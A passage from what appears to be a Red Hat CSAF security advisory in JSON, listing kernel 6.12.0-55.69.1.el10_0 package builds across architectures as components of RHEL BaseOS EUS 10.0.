"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
